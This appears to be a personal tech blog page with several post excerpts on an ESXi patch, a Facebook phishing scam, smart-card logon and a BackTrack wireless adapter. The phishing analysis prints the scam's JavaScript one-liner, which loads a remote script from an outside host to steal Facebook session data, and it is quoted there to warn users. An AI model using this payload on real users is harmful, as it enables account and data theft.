/* */

VMWare ESXi 5 Auto Start/Shutdown

VMWare recently, (and quietly) published a patch I have confirmed will resolve a guest virtual machine startup and shutdown issue that was introduced in March 2012 when they released Update 1.

The issue was that it broke the automatic startup and shutdown of the guest virtual machines when the host machine boots or shuts down. This did not affect enterprise customers who use a cluster, but vastly impacted many of us running individual nodes. Not surprisingly, this only affected the free version of the hypervisor and took 4 months before they decided to fix it due to 1.) community outrage and 2.) the issue extending to some paying enterprise customers.

The patch is ESXi500-201207001 and can be found here: http://www.vmware.com/patchmgr/download.portal. Just search for ESXi 5.0.0. Please note that if you aren’t running the latest patch before this one, you will need to update them sequentially before applying this patch.

As a note to the folks at VMWare: You guys barely averted losing your edge as a virtualization market leader due to angry users. This is not the first time either.

Facebook Security: An Old Phishing Trick, Revived & Analyzed.

In the past, you may remember that I’ve written about many instances where Facebook users were falling for a trick where a link get’s posted on their wall asking them to click a fake link in order to gain access so some “cool” feature such as getting a free iPad, gaining access and see other people’s hidden profile information, or get free male enhancements. They all work on the same principle: a user clicks on a link that takes them to a Facebook page, which instructs them to paste a line JavaScript code into their URL bar and press enter. In turn, this tells the user’s browser to run code that can do pretty much whatever it wants to do with your Facebook session or anything else you might have open, for that matter.

For all you non-tech users out there: DON’T EVER, paste or click any link without first checking out what it may do. And as always, if it sounds too good to be true, IT PROBABLY IS!

In the rest of this post, I’ll analyze in detail, one particular phishing scheme that happened to explode all over Facebook in the last 24-ish hours. Keep in mind, most of the phishing right now is based on this. The rest of the Facebook phishing is done by sending you a fake e-mail with a link to a fake Facebook login page, which then steals your e-mail address and password.

The scam starts with a sent to you, either by e-mail, and/or posted on your wall. It looks something like this:


The link posted takes you to a facebook page that looks like this:


In this particular Facebook page, it redirects you to a 3rd party domain (kkpj.info), which takes you back to another Facebook page that looks exactly like the previous. This is done to retain a Facebook page that they can use to redirect to additional, different Facebook pages, should it be reported. In other words, if the malicious page gets reported, it would be the second one, allowing the original page to be retained and modified. I found this one because NoScript (Firefox Plugin) blocks scripts by default:


This second Facebook page looks like this:


And this one is the one that instructs you to copy and paste some code to run in your browser’s URL bar. Very bad idea for the end user. Let’s take a closer look at the code itself (this one has been de-fanged – refang at your own risk):

javascript: /* FACEBOOK PROFILE VIEWERS */ (a=(b=document).createElement(script)).src=//g2ds.info/d.php?split=1rand=329154403,b.body.appendChild(a) void(0) /* FACEBOOK PROFILE VIEWERS */

This basically tells the browser to execute whatever scripts lie at g2ds.info/d.php with a few parameters from your current Facebook session, most prominently your friends list, but can also include your profile information (e-mail address, residence, phone numbers), or even your Facebook credentials. This kind of attack falls under the category of “User Induced Cross Site Scripting (XSS)”.

A few other interesting notes:

    kkpj.info’s index page simply redirects the user to the second Facebook page, via a JavaScript.
    Both kkpj.info and g2ds.info have the same IP address (, are registered from eNom, Inc, and are hosted by hostgator.com, as evidenced by their nameservers, NS2767.HOSTGATOR.COM, and NS2768.HOSTGATOR.COM. Private registration of these 2 domains prevent identifying details from being revealed.
    g2ds.info is the actual domain where the malicious scripts are run from.


Enabling Smartcard Logon for Active Directory

Since I couldn’t find an all-in-one guide anywhere out there, I’m going to write up a short post on how to enable smart card logon in a Microsoft Active Directory environment.

It’s short since I’m a little bit lazy in documenting every step (these are mainly notes for myself), but if enough people request, I’ll expand this post to include more details.

Read more

Atheros AR9170 & BackTrack 4

I recently broke out my Netgear WNDA3100 adapter that I bought a while ago to replace my old Netgear WG111 that I used to use for cracking wireless networks. Granted, the WG111 was reliable, but the reasons for the replacement are obvious: the WNDA3100 is dual-band and supports 802.11n. But for beginners who don’t want to shell out as much money nor spend extra time getting a wireless card to work properly, the WG111 is still the best choice.

Spend extra time to get the WNDA3100 to work properly? Yes, it didn’t quite readily work with BT4 (and probably not with other distros running the same kernel version). After doing some searching, I found a thread on backtrack-linux.org’s forum that allows my new adapter to work, with full monitor mode & packet injection capabilities. For a matter of record & for easy searching, I’ll document the directions below.

Read more